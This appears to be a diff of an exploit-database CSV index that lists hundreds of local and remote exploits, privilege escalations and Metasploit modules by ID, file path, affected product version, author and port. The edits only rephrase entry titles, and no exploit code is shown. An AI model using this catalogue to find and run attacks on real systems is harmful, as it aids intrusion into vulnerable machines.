19359,platforms/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",windows,local,0
19360,platforms/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - vsyslog() Buffer Overflow",1997-12-21,"Solar Designer",linux,local,0
19362,platforms/sco/local/19362.c,"SCO Open Server 5.0.5 - XBase Buffer Overflow",1999-06-14,doble,sco,local,0
19364,platforms/netware/local/19364.txt,"Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption",1999-04-09,dreamer,netware,local,0
@ -8066,7 +8066,7 @@ id,file,description,date,author,platform,type,port
26185,platforms/osx/local/26185.txt,"Apple Mac OSX 10.4 - dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0
26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 - InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0
26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,linux,local,0
26222,platforms/windows/local/26222.c,"Microsoft Windows Server 2000/2003/XP - Keyboard Event Privilege Escalation",2005-08-06,"Andres Tarasco",windows,local,0
26222,platforms/windows/local/26222.c,"Microsoft Windows XP/2000/2003 - Keyboard Event Privilege Escalation",2005-08-06,"Andres Tarasco",windows,local,0
26242,platforms/windows/local/26242.py,"Adrenalin Player 2.2.5.3 - '.wax' Buffer Overflow (SEH)",2013-06-17,Onying,windows,local,0
26245,platforms/windows/local/26245.py,"Winamp 5.12 - '.m3u' Stack Based Buffer Overflow",2013-06-17,superkojiman,windows,local,0
26321,platforms/linux/local/26321.c,"Gnome-PTY-Helper UTMP - Hostname Spoofing",2005-10-03,"Paul Szabo",linux,local,0
@ -8189,7 +8189,7 @@ id,file,description,date,author,platform,type,port
29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0
29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - '.wstyle' Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0
29603,platforms/windows/local/29603.txt,"Comodo Firewall 2.3/2.4 - Flawed Component Control Cryptographic Hash",2007-02-15,"Matousec Transparent security",windows,local,0
29630,platforms/windows/local/29630.c,"Microsoft Windows Server 2003/XP - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local,0
29630,platforms/windows/local/29630.c,"Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local,0
30192,platforms/windows/local/30192.txt,"Kaspersky Internet Security 6.0 - SSDT Hooks Multiple Local Vulnerabilities",2007-06-15,"Matousec Transparent security",windows,local,0
29695,platforms/windows/local/29695.txt,"Comodo Firewall Pro 2.4.x - Local Protection Mechanism Bypass",2007-03-01,"Matousec Transparent security",windows,local,0
29712,platforms/php/local/29712.txt,"Zend Platform 2.2.1 - PHP.INI File Modification",2007-03-03,"Stefan Esser",php,local,0
@ -8303,12 +8303,12 @@ id,file,description,date,author,platform,type,port
32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0
32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0
32891,platforms/windows/local/32891.txt,"Microsoft Windows Server 2003/2008/XP/Vista - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
32892,platforms/windows/local/32892.txt,"Microsoft Windows Server 2003/XP - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
32893,platforms/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' and 'open_basedir' Restriction-Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local,0
32946,platforms/freebsd/local/32946.c,"FreeBSD 7.1 libc - Berkley DB Interface Uninitialized Memory Local Information Disclosure",2009-01-15,"Jaakko Heinonen",freebsd,local,0
32947,platforms/linux/local/32947.txt,"DirectAdmin 1.33.3 - '/CMD_DB' Backup Action Insecure Temporary File Creation",2009-04-22,anonymous,linux,local,0
33012,platforms/windows/local/33012.c,"Microsoft Windows Server 2000/2003/XP - Desktop Wall Paper System Parameter Privilege Escalation",2009-02-02,Arkon,windows,local,0
33012,platforms/windows/local/33012.c,"Microsoft Windows XP/2000/2003 - Desktop Wall Paper System Parameter Privilege Escalation",2009-02-02,Arkon,windows,local,0
33028,platforms/linux/local/33028.txt,"JRuby Sandbox 0.2.2 - Sandbox Escape",2014-04-25,joernchen,linux,local,0
33069,platforms/windows/local/33069.rb,"Wireshark 1.8.12/1.10.5 - wiretap/mpeg.c Stack Buffer Overflow (Metasploit)",2014-04-28,Metasploit,windows,local,0
33145,platforms/linux/local/33145.c,"PHP Fuzzer Framework - Default Location Insecure Temporary File Creation",2009-08-03,"Melissa Elliott",linux,local,0
@ -8318,7 +8318,7 @@ id,file,description,date,author,platform,type,port
33255,platforms/linux/local/33255.txt,"Xen 3.x - pygrub Local Authentication Bypass",2009-09-25,"Jan Lieskovsky",linux,local,0
33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0
33322,platforms/linux/local/33322.c,"Linux Kernel 2.6.x - 'pipe.c' Privilege Escalation (2)",2009-11-03,"teach & xipe",linux,local,0
33593,platforms/windows/local/33593.c,"Microsoft Windows Server 2000/2003/XP/Vista - Double-Free Memory Corruption Privilege Escalation",2010-02-09,"Tavis Ormandy",windows,local,0
33593,platforms/windows/local/33593.c,"Microsoft Windows XP/Vista/2000/2003 - Double-Free Memory Corruption Privilege Escalation",2010-02-09,"Tavis Ormandy",windows,local,0
33336,platforms/linux/local/33336.c,"Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Privilege Escalation (3)",2013-02-24,SynQ,linux,local,0
33360,platforms/windows/local/33360.c,"Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,windows,local,0
33387,platforms/linux/local/33387.txt,"Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0
@ -8621,7 +8621,7 @@ id,file,description,date,author,platform,type,port
39112,platforms/linux/local/39112.txt,"QNX - '.Phgrafx' File Enumeration",2014-03-10,cenobyte,linux,local,0
39120,platforms/windows/local/39120.py,"KiTTY Portable 0.65.1.1p - Local Saved Session Overflow (Egghunter XP_ Denial of Service 7/8.1/10)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39121,platforms/windows/local/39121.py,"KiTTY Portable 0.65.0.2p - Local kitty.ini Overflow (Wow64 Egghunter Windows 7)",2015-12-29,"Guillaume Kaddouch",windows,local,0
39122,platforms/windows/local/39122.py,"KiTTY Portable 0.65.0.2p (Windows 8.1 / Windows 10) - Local kitty.ini Overflow",2015-12-29,"Guillaume Kaddouch",windows,local,0
39122,platforms/windows/local/39122.py,"KiTTY Portable 0.65.0.2p (Windows 8.1/10) - Local kitty.ini Overflow",2015-12-29,"Guillaume Kaddouch",windows,local,0
39132,platforms/windows/local/39132.py,"FTPShell Client 5.24 - Buffer Overflow",2015-12-30,hyp3rlinx,windows,local,0
39134,platforms/linux/local/39134.txt,"DeleGate 9.9.13 - Privilege Escalation",2015-12-30,"Larry W. Cashdollar",linux,local,0
39147,platforms/osx/local/39147.c,"Apple Mac OSX - Local Security Bypass",2014-04-22,"Ian Beer",osx,local,0
@ -8881,7 +8881,7 @@ id,file,description,date,author,platform,type,port
41607,platforms/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",windows,local,0
41619,platforms/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,windows,local,0
41675,platforms/android/local/41675.rb,"Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,android,local,0
41681,platforms/multiple/local/41681.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-06-23,Metasploit,multiple,local,0
41681,platforms/multiple/local/41681.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (2)",2015-06-23,Metasploit,multiple,local,0
41682,platforms/multiple/local/41682.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-08-06,Metasploit,multiple,local,0
41683,platforms/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,multiple,local,0
41700,platforms/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,windows,local,0
@ -8951,7 +8951,7 @@ id,file,description,date,author,platform,type,port
58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504
63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114
64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135
66,platforms/windows/remote/66.c,"Microsoft Windows Server 2000/XP - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
66,platforms/windows/remote/66.c,"Microsoft Windows XP/2000 - 'RPC DCOM' Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135
67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135
70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135
@ -8983,8 +8983,8 @@ id,file,description,date,author,platform,type,port
110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,linux,remote,21
112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0
116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515
117,platforms/windows/remote/117.c,"Microsoft Windows Server 2000/XP - RPC Remote (Non Exec Memory) Exploit",2003-11-07,ins1der,windows,remote,135
119,platforms/windows/remote/119.c,"Microsoft Windows Server 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0
117,platforms/windows/remote/117.c,"Microsoft Windows XP/2000 - RPC Remote (Non Exec Memory) Exploit",2003-11-07,ins1der,windows,remote,135
119,platforms/windows/remote/119.c,"Microsoft Windows XP/2000 - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0
121,platforms/windows/remote/121.c,"Microsoft FrontPage Server Extensions - 'fp30reg.dll' Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80
123,platforms/windows/remote/123.c,"Microsoft Windows - Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0
124,platforms/windows/remote/124.pl,"IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80
@ -8993,7 +8993,7 @@ id,file,description,date,author,platform,type,port
130,platforms/windows/remote/130.c,"Microsoft Windows XP - Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0
132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure",2003-12-06,m00,linux,remote,80
133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",windows,remote,80
135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135
135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service (French) - Remote Exploit (MS03-043)",2003-12-16,MrNice,windows,remote,135
136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80
139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution",2003-12-27,SpikE,linux,remote,406
143,platforms/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow",2004-01-14,Li0n7,linux,remote,0
@ -9050,7 +9050,7 @@ id,file,description,date,author,platform,type,port
291,platforms/linux/remote/291.c,"TCP Connection Reset - Remote Exploit",2004-04-23,"Paul A. Watson",linux,remote,0
293,platforms/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445
294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - 'connectedNodes.ovpl' Remote Code Execution",2004-04-28,FX,hardware,remote,8000
295,platforms/windows/remote/295.c,"Microsoft Windows Server 2000/XP - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445
295,platforms/windows/remote/295.c,"Microsoft Windows XP/2000 - 'Lsasrv.dll' Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445
296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow",2004-05-05,vade79,linux,remote,0
297,platforms/windows/remote/297.c,"Sasser Worm ftpd - Remote Buffer Overflow (port 5554)",2004-05-16,mandragore,windows,remote,5554
300,platforms/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401
@ -9322,7 +9322,7 @@ id,file,description,date,author,platform,type,port
1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - (EXAMINE) Buffer Overflow",2005-12-19,muts,windows,remote,0
1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow",2005-12-20,muts,windows,remote,143
1381,platforms/windows/remote/1381.pm,"Golden FTP Server 1.92 - (APPE) Remote Overflow (Metasploit)",2005-12-20,redsand,windows,remote,21
1391,platforms/windows/remote/1391.pm,"Microsoft Windows Server 2003/XP - Metafile Escape() Code Execution (Metasploit)",2005-12-27,"H D Moore",windows,remote,0
1391,platforms/windows/remote/1391.pm,"Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)",2005-12-27,"H D Moore",windows,remote,0
1408,platforms/windows/remote/1408.pl,"BlueCoat WinProxy 6.0 R1c - (Host) Remote Stack/SEH Overflow",2006-01-07,FistFuXXer,windows,remote,80
1413,platforms/windows/remote/1413.c,"eStara SoftPhone 3.0.1.46 - (SIP) Remote Buffer Overflow (1)",2006-01-12,ZwelL,windows,remote,0
1414,platforms/windows/remote/1414.pl,"eStara SoftPhone 3.0.1.46 - (SIP) Remote Buffer Overflow (2)",2006-01-12,kokanin,windows,remote,5060
@ -9402,7 +9402,7 @@ id,file,description,date,author,platform,type,port
2080,platforms/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)",2006-07-27,"Kevin Finisterre",windows,remote,10616
2082,platforms/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution (PoC)",2006-07-28,"H D Moore",multiple,remote,0
2136,platforms/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",hardware,remote,0
2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)",2006-08-07,ri0t,windows,remote,10616
2140,platforms/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)",2006-08-07,ri0t,windows,remote,10616
2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0
2162,platforms/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-08-10,"H D Moore",windows,remote,445
2164,platforms/windows/remote/2164.pm,"Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",windows,remote,0
@ -9745,7 +9745,7 @@ id,file,description,date,author,platform,type,port
4594,platforms/windows/remote/4594.html,"SonicWALL SSL-VPN - NeLaunchCtrl ActiveX Control Remote Exploit",2007-11-01,krafty,windows,remote,0
4598,platforms/windows/remote/4598.html,"EDraw Flowchart ActiveX Control 2.0 - Insecure Method Exploit",2007-11-02,shinnai,windows,remote,0
4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0
4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 (Windows Vista / Windows XP) - RSTP Response Code Execution",2007-11-24,InTeL,windows,remote,0
4651,platforms/windows/remote/4651.cpp,"Apple QuickTime 7.2/7.3 (Windows Vista/XP) - RSTP Response Code Execution",2007-11-24,InTeL,windows,remote,0
4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 (Internet Explorer 7 / Firefox / Opera) - RTSP Response Universal Exploit",2007-11-26,muts,windows,remote,0
4663,platforms/windows/remote/4663.html,"BitDefender Online Scanner 8 - ActiveX Heap Overflow",2007-11-27,Nphinity,windows,remote,0
4664,platforms/windows/remote/4664.txt,"Apple QuickTime 7.2/7.3 - RSTP Response Universal Exploit",2007-11-27,"YAG KOHHA",windows,remote,0
@ -10943,7 +10943,7 @@ id,file,description,date,author,platform,type,port
16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata 'in_mp3.dll' - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16612,platforms/windows/remote/16612.rb,"Microsoft Windows Server 2003/XP/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16612,platforms/windows/remote/16612.rb,"Microsoft Windows XP/Vista/2003 - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
16616,platforms/windows/remote/16616.rb,"SonicWALL SSL-VPN - NetExtender ActiveX Control Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16630,platforms/windows/remote/16630.rb,"CA eTrust PestPatrol - ActiveX Control Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
@ -11519,7 +11519,7 @@ id,file,description,date,author,platform,type,port
19231,platforms/windows/remote/19231.rb,"PHP 5.4.3 - apache_request_headers Function Buffer Overflow (Metasploit)",2012-06-17,Metasploit,windows,remote,0
19236,platforms/solaris/remote/19236.txt,"Solaris 7.0 Coredump - Exploit",1996-08-03,"Jungseok Roh",solaris,remote,0
19237,platforms/aix/remote/19237.txt,"Gordano NTMail 3.0/5.0 - SPAM Relay",1999-06-08,Geo,aix,remote,0
19239,platforms/windows/remote/19239.txt,"Microsoft IIS (Windows NT 4.0/SP1/SP2/SP3/SP4/SP5) - IIS IDC Path Mapping",1999-06-04,"Scott Danahy",windows,remote,0
19239,platforms/windows/remote/19239.txt,"Microsoft IIS (Windows NT 4.0/SP1/SP2/SP3/SP4/SP5) - '.IDC' Path Mapping",1999-06-04,"Scott Danahy",windows,remote,0
19242,platforms/multiple/remote/19242.txt,"CdomainFree 2.4 - Remote Command Execution",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote,0
19245,platforms/windows/remote/19245.pl,"Microsoft IIS 4.0 - Buffer Overflow (1)",1999-06-15,"eEye Digital Security Team",windows,remote,0
19246,platforms/windows/remote/19246.pm,"Microsoft IIS 4.0 - Buffer Overflow (2)",1999-06-15,Stinko,windows,remote,0
@ -11579,7 +11579,7 @@ id,file,description,date,author,platform,type,port
19503,platforms/linux/remote/19503.txt,"ProFTPd 1.2 pre6 - snprintf Exploit",1999-09-17,"Tymm Twillman",linux,remote,0
19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 - Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0
19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/Windows NT 4) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/NT 4) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0
19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0
@ -11861,7 +11861,7 @@ id,file,description,date,author,platform,type,port
20216,platforms/multiple/remote/20216.sh,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 - Session Agent Dictionary Attack (2)",2000-10-01,"Gregory Duchemin",multiple,remote,0
20218,platforms/cgi/remote/20218.txt,"YaBB 9.1.2000 - Arbitrary File Read",2000-09-10,pestilence,cgi,remote,0
20220,platforms/linux/remote/20220.txt,"Mandrake 6.1/7.0/7.1 - /perl http Directory Disclosure",2000-09-11,anonymous,linux,remote,0
20222,platforms/windows/remote/20222.cpp,"Microsoft Windows Server 2000 - telnet.exe NTLM Authentication",2000-08-14,@stake,windows,remote,0
20222,platforms/windows/remote/20222.cpp,"Microsoft Windows Server 2000 - 'telnet.exe' NTLM Authentication",2000-08-14,@stake,windows,remote,0
20223,platforms/windows/remote/20223.txt,"Sambar Server 4.3/4.4 Beta 3 - Search CGI",2000-09-15,dethy,windows,remote,0
20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0
20231,platforms/hardware/remote/20231.txt,"Cisco PIX Firewall 4.x/5.x - SMTP Content Filtering Evasion",2000-09-19,"Lincoln Yeoh",hardware,remote,0
@ -13378,8 +13378,8 @@ id,file,description,date,author,platform,type,port
25034,platforms/windows/remote/25034.txt,"GREED 0.81 - '.GRX' File List Command Execution",2004-12-15,"Manigandan Radhakrishnan",windows,remote,0
25035,platforms/linux/remote/25035.txt,"PCAL 4.x - Calendar File getline Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0
25036,platforms/linux/remote/25036.txt,"PCAL 4.x - Calendar File get_holiday Buffer Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0
25049,platforms/windows/remote/25049.txt,"Microsoft Windows Server 2000/2003/XP - winhlp32 Phrase Integer Overflow",2004-12-23,"flashsky fangxing",windows,remote,0
25050,platforms/windows/remote/25050.txt,"Microsoft Windows Server 2000/2003/XP - winhlp32 Phrase Heap Overflow",2004-12-23,"flashsky fangxing",windows,remote,0
25049,platforms/windows/remote/25049.txt,"Microsoft Windows XP/2000/2003 -'winhlp32' Phrase Integer Overflow",2004-12-23,"flashsky fangxing",windows,remote,0
25050,platforms/windows/remote/25050.txt,"Microsoft Windows XP/2000/2003 - 'winhlp32' Phrase Heap Overflow",2004-12-23,"flashsky fangxing",windows,remote,0
25054,platforms/linux/remote/25054.txt,"konversation irc client 0.15 - Multiple Vulnerabilities",2005-01-19,wouter@coekaerts.be,linux,remote,0
25057,platforms/windows/remote/25057.txt,"DivX Player 2.6 - '.Skin' File Directory Traversal",2005-01-21,"Luigi Auriemma",windows,remote,0
25066,platforms/multiple/remote/25066.txt,"WebWasher Classic 2.2/2.3 - HTTP CONNECT Unauthorized Access",2005-01-28,"Oliver Karow",multiple,remote,0
@ -13424,7 +13424,7 @@ id,file,description,date,author,platform,type,port
25359,platforms/hardware/remote/25359.txt,"Linksys WET11 - Password Update Remote Authentication Bypass",2005-04-07,"Kristian Hermansen",hardware,remote,0
25365,platforms/windows/remote/25365.txt,"AN HTTPD 1.42 - Arbitrary Log Content Injection",2005-04-08,"Tan Chew Keong",windows,remote,0
25375,platforms/linux/remote/25375.pl,"KDE KMail 1.7.1 - HTML EMail Remote Email Content Spoofing",2005-04-11,"Noam Rathaus",linux,remote,0
25384,platforms/windows/remote/25384.c,"Microsoft Windows Server 2000/XP - Internet Protocol Validation Remote Code Execution (2)",2005-04-16,"Yuri Gushin",windows,remote,0
25384,platforms/windows/remote/25384.c,"Microsoft Windows XP/2000 - Internet Protocol Validation Remote Code Execution (2)",2005-04-16,"Yuri Gushin",windows,remote,0
25385,platforms/windows/remote/25385.cpp,"Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow (MS05-020)",2005-04-12,"Miguel Tarasc",windows,remote,0
25386,platforms/windows/remote/25386.txt,"Microsoft Internet Explorer 5.0.1 - DHTML Object Race Condition Memory Corruption",2005-04-12,"Berend-Jan Wever",windows,remote,0
25391,platforms/multiple/remote/25391.txt,"XAMPP - Phonebook.php Multiple Remote HTML Injection Vulnerabilities",2005-04-12,"Morning Wood",multiple,remote,0
@ -13722,7 +13722,7 @@ id,file,description,date,author,platform,type,port
28336,platforms/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet Arbitrary File Upload (Metasploit)",2013-09-17,Metasploit,windows,remote,443
28337,platforms/windows/remote/28337.rb,"HP ProCurve Manager SNAC - UpdateCertificatesServlet Arbitrary File Upload (Metasploit)",2013-09-17,Metasploit,windows,remote,443
28344,platforms/multiple/remote/28344.txt,"DConnect Daemon - Listen Thread UDP Remote Buffer Overflow",2006-08-06,"Luigi Auriemma",multiple,remote,0
28357,platforms/windows/remote/28357.asc,"Microsoft Windows Explorer 2000/2003/XP - Drag and Drop Remote Code Execution",2006-07-27,"Plebo Aesdi Nael",windows,remote,0
28357,platforms/windows/remote/28357.asc,"Microsoft Windows XP/2000/2003 - Explorer Drag and Drop Remote Code Execution",2006-07-27,"Plebo Aesdi Nael",windows,remote,0
28360,platforms/windows/remote/28360.c,"EasyCafe 2.1/2.2 - Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",windows,remote,0
28365,platforms/multiple/remote/28365.txt,"Apache 2.2.2 - CGI Script Source Code Information Disclosure",2006-08-09,"Susam Pal",multiple,remote,0
28368,platforms/multiple/remote/28368.txt,"ArcSoft Mms Composer 1.5.5/2.0 - Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",multiple,remote,0
@ -14984,7 +14984,7 @@ id,file,description,date,author,platform,type,port
37512,platforms/hardware/remote/37512.txt,"Barracuda SSL VPN - launchAgent.do return-To Parameter Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
37513,platforms/hardware/remote/37513.txt,"Barracuda SSL VPN - fileSystem.do Multiple Parameter Cross-Site Scripting",2012-07-18,"Benjamin Kunz Mejri",hardware,remote,0
37523,platforms/multiple/remote/37523.rb,"Adobe Flash Player - ByteArray Use-After-Free (Metasploit)",2015-07-08,Metasploit,multiple,remote,0
37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)",2015-07-08,Metasploit,multiple,remote,0
37536,platforms/multiple/remote/37536.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (1)",2015-07-08,Metasploit,multiple,remote,0
37542,platforms/windows/remote/37542.html,"Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow",2012-07-25,coolkaveh,windows,remote,0
37576,platforms/linux/remote/37576.cpp,"Alligra Calligra - Heap Based Buffer Overflow",2012-08-07,"Charlie Miller",linux,remote,0
37597,platforms/hardware/remote/37597.rb,"Accellion FTA - getStatus verify_oauth_token Command Execution (Metasploit)",2015-07-13,Metasploit,hardware,remote,443
@ -15415,7 +15415,7 @@ id,file,description,date,author,platform,type,port
41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
